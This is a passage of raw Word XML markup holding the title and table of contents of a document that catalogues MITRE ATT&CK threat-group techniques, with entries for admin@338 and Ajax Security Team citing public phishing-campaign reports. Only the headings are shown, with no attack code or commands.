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0A4AF" w14:textId="506C5C7A" w:rsidR="00F83236" w:rsidRDefault="00B16144" w:rsidP="007A6CF9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc110935490"/>
      <w:bookmarkStart w:id="1" w:name="_Toc153480828"/>
      <w:r>
        <w:t>ATT&amp;CK Group Attack Fragments</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="5B515EA9" w14:textId="1109CE7C" w:rsidR="007621CE" w:rsidRPr="007621CE" w:rsidRDefault="007621CE" w:rsidP="007621CE"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:id w:val="142173561"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="1508EF11" w14:textId="77777777" w:rsidR="007621CE" w:rsidRDefault="007621CE" w:rsidP="007621CE">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="0A05B2F6" w14:textId="6403F80E" w:rsidR="00BC4FB3" w:rsidRDefault="007621CE">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \o "1-4" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc153480828" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ATT&amp;CK Group Attack Fragments</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480828 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="17AF2CAF" w14:textId="7577FE04" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480829" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Introduction</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480829 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3651FA96" w14:textId="32F3870C" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480830" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>An Attack Classification Model for ATT&amp;CK References</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480830 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="02070B23" w14:textId="7D0EEC32" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480831" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.3</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Machine Readable Attack Technique Sequences</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480831 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6342EB7F" w14:textId="14255DC5" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480832" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Documented Attacks from ATT&amp;CK by APT</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480832 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1951404E" w14:textId="7BA6FE4C" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480833" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.1</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>admin@338</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480833 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5D1CC0A8" w14:textId="311C1ACB" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480834" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.1.1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_Toc153480834 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3317E272" w14:textId="09716FB4" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480835" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.1.2</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>T1566.001 - China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480835 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3656FB18" w14:textId="18769375" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480836" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.2</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Ajax Security Team</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480836 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="41EB8CBA" w14:textId="3A714E3D" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480837" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.2.1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_Toc153480837 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0482A094" w14:textId="304B3C3C" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480838" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.2.2</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>T1566.001 - ROCKET KITTEN: A CAMPAIGN WITH 9 LIVES</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480838 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2256FB8D" w14:textId="2A1DEA97" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480839" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.2.3</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>T1566.002 - OPERATION SAFFRON ROSE</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480839 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
